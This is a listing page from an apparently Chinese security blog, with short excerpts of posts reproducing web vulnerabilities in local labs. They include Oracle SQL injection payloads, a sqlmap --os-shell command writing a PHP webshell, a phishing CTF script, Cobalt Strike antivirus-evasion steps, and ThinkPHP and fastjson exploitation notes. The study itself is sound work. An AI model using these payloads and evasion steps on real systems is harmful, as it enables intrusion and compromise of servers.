- 博客(12)
- 收藏
- 关注
RSS订阅原创 Oracle 注入
判断注入id=1 and 1=1--id=1 and 1=2--通过<>(不等于)id=1 and 1<>2--id=1 and 1<>1--联合查询判断列数id=1 order by 4--空位用null填充,得到回显位id=-1 union select null, null, null, null from dual --id=-1 union select null, to_nchar('aaa'), to_nchar('bbb'), nu
2021-11-24 21:21:49
479
原创 [复现]fastjson 1.2.24
前言学习了JNDI、RMI、LDAP基础后,开始复现Fastjson漏洞。三种利用链JdbcRowSetImplTemplatesImplBasicDataSource搭建靶场本机环境win10Java 1.8.0_101Maven 3.8.1IDEA启动一个springmvc项目,maven导入fastjson1.2.24版本的包。<dependency> <groupId>com.alibaba</groupId> <artif
2021-09-07 20:07:32
1029
原创 sqlmap os shell中文路径问题
问题看了师傅文章MSSQL高权限注入写马至中文路径自己复现一下。复现环境:win10phpstudysqli-labs靶场python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-shell --proxy http://127.0.0.1:8080正常写带中文路径的,可以看到是失败的没有生成文件。burp抓个包。将命令GB2312编码,然后替换到burp上。echo ^<?php @
2021-08-19 23:46:29
1333
原创 钓鱼(一)
前言昨晚公众号看的文章一道针对安全人员进行定向攻击的CTF题,满有意思的复现一波。复现<!DOCTYPE html><html><head><meta charset="utf-8"><title>about</title><script>function addLink() { var body_element = document.body; var selection; sel
2021-08-16 10:43:40
104
原创 cs免杀(一)
前言网上搜了几篇文章复现下操作。ps1文件免杀生成ps1文件将关键字FromBase64String括号内的字符串复制起来。将下面代码保存改为ps1文件执行$string = ''$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('刚刚复制的字符串')$s |foreach { $string = $string + $_.ToString()+','}$string > d:\1.txt 代码输出到1.t
2021-08-12 17:37:13
684
原创 [复现]Thinkphp5系列漏洞
SQL注入parseData方法本次漏洞存在于 Builder 类的 parseData 方法中。由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5 。测试代码,我这里用的版本是 ThinkPHP 5.0.15public function index() { update / insert 方法
2021-08-05 11:49:43
7288
2
原创 [复现]Thinkphp3.2.3 漏洞
前言纸上得来终觉浅,绝知此事要躬行。日志泄露ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且日志结构容易被猜解,造成信息泄露。THINKPHP3.1结构:Runtime/Logs/Home/年份_月份_日期.logTHINKPHP3.2 结构:Application/Runtime/Logs/Home/年份_月份_日期.log需要注意的是日志的路径不是绝对的,开发者可以修改的,平时可以收集下用时fuzz。SQL 注入user表一个小例子代码如下$id
2021-08-02 18:02:44
15543
原创 [代码审计]Emlog6.1.1
Emlog6.1.1https://www.tongleer.com/emlog6Emlog6.1.1全新外观的Emlog记录生活,感动天地。安装包(自用程序) 升级包 每日一次机会发布免费/收费模板插件扩展到应用商店审核结果内置应用商店已收录模板(402)个|插件(153)个|扩展(6)个Emlog(非官方)是一款国内开源的博客系统程序,是基于PHP+MYSQL结构开发的功能强大且免费的博客系统, 它安装和使用都非常方便,且快速稳定,使用简单,模板插件众多,博客性能易于扩充,总的来说该博客
2021-07-28 17:45:33
254
原创 phpstorm xdebug环境搭建
下载 xdebug & php.ini 配置https://blog.youkuaiyun.com/github_38336924/article/details/90024015具体下载看上面链接文章(注意:下载低版本的xdebug,高版本容易报错)刚开始我用了3.0.4的版本死活不行,然后换了个旧点的搞定了。php.ini 配置如下[XDebug]zend_extension="D:\Software\phpStudy\PHPTutorial\php\php-7.2.1-nts\ext\php
2021-07-23 16:31:50
2280
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人